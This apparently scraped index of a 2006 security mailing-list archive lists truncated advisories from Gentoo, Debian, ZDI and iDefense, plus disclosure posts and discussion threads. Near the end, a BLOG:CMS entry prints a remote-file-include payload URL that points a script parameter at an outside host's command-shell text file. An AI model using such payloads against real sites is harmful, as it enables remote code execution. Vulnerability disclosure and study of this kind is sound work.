rPSA-2006-0232-1 libgsf
2006-12-14 rPath Update Announcements (announce-noreply rpath com)
rPath Security Advisory: 2006-0232-1
Published: 2006-12-14
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification: Indirect User Deterministic Unauthorized Access
Updated Versions: libgsf=/conary.rpath.com@rpl:devel//1/1.12.0-4.2-1
References: http://www.cve.mitre.org/cgi-b

HyperAccess - Multiple Vulnerabilities
2006-12-14 Brett Moore (brett moore security-assessment com)
Not long now...
Hyper Access - Multiple Vulnerabilities
Vendor Website: http://www.hilgraeve.com
Affected Software: Hyper Access 8.4 (and possibly lower)
Public disclosure on Thursday December 14, 200

GenesisTrader v1.0 - Multiple Vulnerabilities
2006-12-14 mr_kaliman msn com
GenesisTrader v1.0
Vendor site: http://www.genesis-php.com/
Product: GenesisTrader v1.0
Vulnerability: Source Code Disclosure, Arbitrary File Upload & XSS
Credits: Mr_KaLiMaN
Reported to Vendor: 06/12/06
Public disclosure: 14/12/06
Description:
Source Code Disclosu

Re: [fuzzing] NOT a 0day! Re: [Full-disclosure] OWASP Fuzzing page
2006-12-14 Jerome Athias (jerome athias free fr)
Gadi Evron wrote:
> On Tue, 12 Dec 2006, Joxean Koret wrote:
>
>> Wow! That's fun! The so called "Word 0 day" flaw also affects
>> OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
>> with the file:
>>
>
> This is NOT a 0day. It is a disclosed vulnerability in full-dis

[ GLSA 200612-16 ] Links: Arbitrary Samba command execution
2006-12-14 Raphael Marichez (falco gentoo org)

The (in)security of Xorg and DRI
2006-12-14 Darren Reed (avalon caligula anu edu au)
In recent discussion, the topic of the Xorg server being a huge security vulnerability because of its DRI model has come up. The problem being that you have user space code communicating with chips in the system and being able to control DMA and what goes which way on the system bus... Does anyon

[ GLSA 200612-15 ] McAfee VirusScan: Insecure DT_RPATH
2006-12-14 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

Re: The newest Word flaw is due to malformed data structure handling
2006-12-14 Steven M. Christey (coley mitre org)
Alexander Sotirov said:
>Descriptions of vulnerabilities, especially ones that are found in the
>wild, should include enough information to allow researchers to
>uniquely identify the new vulnerability and differentiate it from all
>other bugs, both known ones and 0days.
I say this periodically,

CORE-2006-1127: ProFTPD Controls Buffer Overflow
2006-12-13 CORE Security Technologies Advisories (advisories coresecurity com)

ZDI-06-050: Symantec Veritas NetBackup CONNECT_OPTIONS Buffer Overflow Vulnerability
2006-12-13 zdi-disclosures 3com com
ZDI-06-050: Symantec Veritas NetBackup CONNECT_OPTIONS Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-050.html
December 13, 2006
-- CVE ID: CVE-2006-5822
-- Affected Vendor: Symantec
-- Affected Products: Veritas NetBackup 6.0 < MP4 Veritas NetBackup

ZDI-06-049: Symantec Veritas NetBackup Long Request Buffer Overflow Vulnerability
2006-12-13 zdi-disclosures 3com com
ZDI-06-049: Symantec Veritas NetBackup Long Request Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-049.html
December 13, 2006
-- CVE ID: CVE-2006-6222
-- Affected Vendor: Symantec
-- Affected Products: Veritas NetBackup 6.0 < MP4 Veritas NetBackup 5.1

IBM DB2 Remote DoS during CONNECT processing
2006-12-13 Team SHATTER (shatter appsecinc com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
IBM DB2 Remote DoS during CONNECT processing
AppSecInc Team SHATTER Security Advisory: http://www.appsecinc.com/resources/alerts/db2/2006-09-05.shtml
Affected versions: All versions of IBM DB2 Database Server
Risk level: Medium
Credits: This vulnera

[SECURITY] [DSA-1236-1] New enemies-of-carlotta package fix missing sanity checks
2006-12-13 Steve Kemp (skx debian org)

[SECURITY] [DSA-1235-1] New ruby1.8 package fix denial of service
2006-12-13 Steve Kemp (skx debian org)

[SECURITY] [DSA-1234-1] New ruby1.6 package fix denial of service
2006-12-13 Steve Kemp (skx debian org)

Re: worksystem => Remote File Include Vulnerability Exploit
2006-12-13 Laurent van_den_reysen tiscali fr

ASP Cmd Shell On IIS 5.1
2006-12-13 Brett Moore (brett moore security-assessment com)
% ASP Cmd Shell On IIS 5.1
% brett.moore (at) security-assessment (dot) com
ASP shells have been around since the dawn of time. On IIS 5.0 and prior it wa

iDefense Security Advisory 12.12.06: Sun Microsystems Solaris ld.so Directory Traversal Vulnerability
2006-12-12 iDefense Labs (labs-no-reply idefense com)
Sun Microsystems Solaris ld.so Directory Traversal Vulnerability
iDefense Security Advisory 12.12.06
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 12, 2006
I. BACKGROUND
Solaris is a UNIX operating system developed by Sun Microsystems. More information can be found at http://www.sun

[ GLSA 200612-14 ] Trac: Cross-site request forgery
2006-12-12 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

iDefense Security Advisory 12.12.06: Sun Microsystems Solaris ld.so 'doprf()' Buffer Overflow Vulnerability
2006-12-12 iDefense Labs (labs-no-reply idefense com)
Sun Microsystems Solaris ld.so 'doprf()' Buffer Overflow Vulnerability
iDefense Security Advisory 12.12.06
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 12, 2006
I. BACKGROUND
Solaris is a UNIX operating system developed by Sun Microsystems. More information can be found at http://w

[ GLSA 200612-13 ] libgsf: Buffer overflow
2006-12-12 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

[ GLSA 200612-12 ] F-PROT Antivirus: Multiple vulnerabilities
2006-12-12 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

ZDI-06-046: Sophos Anti-Virus SIT Archive Parsing Buffer Overflow Vulnerability
2006-12-12 zdi-disclosures 3com com
ZDI-06-046: Sophos Anti-Virus SIT Archive Parsing Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-046.html
December 12, 2006
-- CVE ID: CVE-2006-6335
-- Affected Vendor: Sophos
-- Affected Products: All versions of Sophos Anti-Virus < v2.40 scanning en

ZDI-06-048: Microsoft Internet Explorer normalize() Function Memory Corruption Vulnerability
2006-12-12 zdi-disclosures 3com com
ZDI-06-048: Microsoft Internet Explorer normalize() Function Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-048.html
December 12, 2006
-- CVE ID: CVE-2006-5581
-- Affected Vendor: Microsoft
-- Affected Products: Internet Explorer 6
-- TippingPoint(

Secunia Research: Internet Explorer Script Error Handling MemoryCorruption
2006-12-12 Secunia Research (remove-vuln secunia com)

BLOG:CMS Remote file include Vulnerability
2006-12-10 security soqor net
Hello
BLOG:CMS Remote file include Vulnerability
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security (at) soqor (dot) net
admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cm d.txt?admin
#WwW.SoQoR.NeT
Ubuntu Security Notice USN-380-2 December 14, 2006
avahi regression
https://launchpad.net/bugs/72728
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.10